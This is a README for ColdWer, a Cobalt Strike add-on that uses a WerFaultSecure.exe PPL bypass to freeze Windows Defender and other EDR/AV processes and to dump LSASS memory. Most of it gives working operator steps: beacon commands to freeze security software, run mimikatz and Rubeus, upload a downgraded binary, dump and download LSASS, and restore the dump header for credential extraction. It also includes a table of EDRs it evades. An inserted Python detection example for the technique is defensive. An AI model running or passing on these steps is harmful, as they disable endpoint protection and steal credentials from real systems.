ColdWer
A cold war on your endpoint.


🥶 ColdWer

ColdWer leverages a WerFaultSecure.exe PPL bypass to freeze EDR/AV processes and dump LSASS memory on modern Windows systems.

C O L D W E R
        └─┴─┴── WerFaultSecure
    └─┴──────── LSASS Dump
└─┴──────────── Cold (Freeze)

Freeze your EDR/AV. Extract what you need. Stay cold.


👤 Author

Sh3llf1r3 (@0xsh3llf1r3)


πŸ™ Credits

This project builds upon research by TwoSevenOneT (@TwoSevenOneT):

Project Description
EDR-Freeze Original EDR freeze technique
WSASS LSASS dump via WerFaultSecure

All credit for the underlying techniques goes to TwoSevenOneT.


🔥 Features

| Feature | Description |
|---|---|
| ❄️ Freeze | Put EDR/AV processes into a coma state |
| 🔓 Dump | Extract LSASS memory, bypassing PPL |
| 🛡️ PPL Bypass | Leverage WerFaultSecure.exe at WinTcb level |
| ⚡ Fast | Inline BOF execution |
| 🎯 Manual Control | You decide when to freeze and unfreeze |

🚀 Getting Started

📋 Prerequisites

  • Cobalt Strike 4.x
  • High integrity beacon (Administrator/SYSTEM)

💾 Installation

  1. Clone the repository:
     git clone https://github.com/0xsh3llf1r3/ColdWer.git
  2. Load the aggressor script in Cobalt Strike:
     • Go to Cobalt Strike → Script Manager
     • Click Load
     • Select cw/coldwer.cna

📦 Building from Source

# Navigate to source directory
cd src/

# Compile BOF (requires MinGW)
make

# Or manually:
x86_64-w64-mingw32-gcc -c coldwer.c -o ../cw/coldwer.o

📥 Quick Download

  1. Go to Releases
  2. Download coldwer.o and coldwer.cna
  3. Place both in the same folder
  4. Load coldwer.cna in Cobalt Strike

🖥️ Usage

❄️ Freeze EDR/AV

# Find Windows Defender PID
beacon> ps

# Freeze the process
beacon> cw-freeze 1337

# Execute your commands while EDR/AV is frozen
beacon> mimikatz sekurlsa::logonpasswords
beacon> execute-assembly /tools/Rubeus.exe triage

# Unfreeze when done
beacon> cw-unfreeze

🔓 Dump LSASS

# Step 1: Upload Win8.1 WerFaultSecure.exe
beacon> cd C:\Windows\Temp
beacon> upload /path/to/bin/wfs.exe

# Step 2: Find LSASS PID
beacon> ps

# Step 3: Dump LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# Step 4: Download the dump
beacon> download C:\Windows\Temp\lsass.dmp

🔧 After Download

The dump is written with a PNG file signature; overwrite its first four bytes with MDMP to restore the minidump format:

| Original (PNG) | Change to (MDMP) |
|---|---|
| 89 50 4E 47 | 4D 44 4D 50 |

Restore Header Commands:

  • Python: open('lsass.dmp','r+b').write(b'MDMP')
  • Bash: printf '\x4d\x44\x4d\x50' | dd of=lsass.dmp bs=1 count=4 conv=notrunc
  • PowerShell: $f=[IO.File]::Open("lsass.dmp","Open","Write");$f.Write([byte[]](0x4D,0x44,0x4D,0x50),0,4);$f.Close()

Then parse with Mimikatz:

mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonpasswords

📋 Commands

| Command | Description |
|---|---|
| cw-freeze <PID> [Path] | Freeze process |
| cw-unfreeze | Unfreeze previously frozen process |
| cw-dump <PID> <Path> | Dump LSASS memory |

πŸ“ Examples

# Freeze with default path
beacon> cw-freeze 1337

# Use custom WerFaultSecure.exe
beacon> cw-freeze 1337 C:\Windows\Temp\wfs.exe

# Dump LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# Unfreeze when done
beacon> cw-unfreeze

✅ Supported Targets

| Target | Status |
|---|---|
| Windows Defender (MsMpEng.exe) | ✅ Works |
| LSASS (lsass.exe) | ✅ Works |
| Other PPL processes | ✅ Works |

⚠️ Limitations

Does NOT work against EDRs with kernel-mode self-protection:

| EDR | Status |
|---|---|
| Elastic Endpoint | ❌ Blocked |
| CrowdStrike Falcon | ❌ Blocked |
| SentinelOne | ❌ Blocked |
| Carbon Black | ❌ Blocked |

βš™οΈ How It Works

1. πŸš€ Launch WerFaultSecure.exe as PPL (WinTcb level)
                    ↓
2. 🎯 WerFaultSecure attaches to target process
                    ↓
3. ⏸️  MiniDumpWriteDump suspends all target threads
                    ↓
4. πŸ₯Ά Suspend WerFaultSecure itself β†’ Target stays frozen
                    ↓
5. βœ… Execute your commands (EDR/AV can't see!)
                    ↓
6. πŸ”₯ Terminate WerFaultSecure β†’ Target unfreezes

🔑 Why Win8.1 WerFaultSecure?

| Version | Output |
|---|---|
| Windows 10/11 | Encrypted dump only |
| Windows 8.1 | Raw unencrypted dump |
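Added detection example (not part of ColdWer or the upstream projects): it checks constructed Sysmon-style process-creation lines for the pattern the "How It Works" steps and the Win8.1 table describe, a WerFaultSecure.exe copy started from a non-system path under another name (wfs.exe in the Usage section) or carrying a Windows 8.1 era (6.3.x) file version. The field names Image, OriginalFileName and FileVersion follow Sysmon's ProcessCreate event; the sample lines, the version strings and the key=value layout are constructed for this example.

```python
import re
from typing import Dict, List, Tuple

# Genuine WerFaultSecure.exe lives under the system directories on a stock install.
EXPECTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Windows 8.1 binaries carry 6.3.x file versions; the README needs the 8.1 copy
# (unencrypted dump), so a 6.3.x WerFaultSecure starting on a Windows 10/11 host
# is a downgraded, planted binary rather than the OS-shipped one.
LEGACY_VERSION_PREFIX = "6.3."

# Constructed Sysmon-style ProcessCreate lines, not real telemetry.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\WerFaultSecure.exe OriginalFileName=WerFaultSecure.exe FileVersion=10.0.22621.1",
    r"Image=C:\Windows\Temp\wfs.exe OriginalFileName=WerFaultSecure.exe FileVersion=6.3.9600.17415",
    r"Image=C:\Windows\System32\notepad.exe OriginalFileName=NOTEPAD.EXE FileVersion=10.0.22621.1",
]

def parse_event(line: str) -> Dict[str, str]:
    """Parse a flat key=value line (values contain no spaces) into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def werfaultsecure_findings(event: Dict[str, str]) -> List[str]:
    """Reasons a process-creation event matches the ColdWer pattern (empty if none).

    Keyed on OriginalFileName from the PE version resource, so a copy renamed
    on disk (wfs.exe in the Usage section) is still matched.
    """
    if event.get("OriginalFileName", "").lower() != "werfaultsecure.exe":
        return []
    image = event.get("Image", "").lower()
    reasons = []
    if not image.startswith(EXPECTED_DIRS):
        reasons.append("image outside System32/SysWOW64: " + event.get("Image", "?"))
    if image.rsplit("\\", 1)[-1] != "werfaultsecure.exe":
        reasons.append("binary renamed on disk")
    version = event.get("FileVersion", "")
    if version.startswith(LEGACY_VERSION_PREFIX):
        reasons.append("Windows 8.1 era (6.3.x) build: " + version)
    return reasons

def scan(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Run the check over event lines; return (line index, reasons) for hits only."""
    hits = []
    for idx, line in enumerate(lines):
        reasons = werfaultsecure_findings(parse_event(line))
        if reasons:
            hits.append((idx, reasons))
    return hits
```

Running scan(SAMPLE_EVENTS) flags only the second line, with all three reasons; the stock System32 binary and the unrelated process produce no findings.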

πŸ” Troubleshooting

Error Cause Solution
File not found Invalid path Check WerFaultSecure.exe path
Access denied Low privileges Run as Administrator/SYSTEM
Invalid signature Unsigned binary Use properly signed WerFaultSecure.exe
Process does not exist Wrong PID Verify PID with ps command
Target protected Kernel protection EDR has self-protection (not bypassable)
Already frozen State stuck Run cw-unfreeze first

βš–οΈ Disclaimer

⚠️ FOR AUTHORIZED SECURITY TESTING ONLY

This tool is intended for:
- Authorized penetration testing
- Red team operations with written permission
- Security research in controlled environments

The author is not responsible for any misuse or damage caused by this tool.
Unauthorized access to computer systems is illegal.

📜 License

MIT License - See LICENSE


🥶 Stay Cold. Stay Quiet. 🥶

⭐ Star this repo if you find it useful! ⭐
